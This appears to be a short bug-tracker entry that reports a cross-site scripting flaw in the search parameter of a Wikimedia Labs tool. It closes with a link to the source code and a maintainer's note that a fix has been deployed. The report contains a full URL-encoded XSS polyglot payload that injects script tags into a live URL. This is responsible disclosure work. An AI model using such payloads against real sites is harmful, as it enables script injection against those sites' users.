Last modified: 2013-02-03 16:40:33 UTC
Created attachment 11722 [details] xss xss in site url, test on firefox browser. http://creatorlinks.wmflabs.org/search.php?search=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3B+alert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--+%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E
.
Source code for this seems to be at Tpt's github: https://github.com/Tpt/creatorLinks
Fixed and deployed. Thanks a lot! https://github.com/Tpt/creatorLinks/commit/7d6dff75169f847cb9bbc6f0b5139dc60df634d6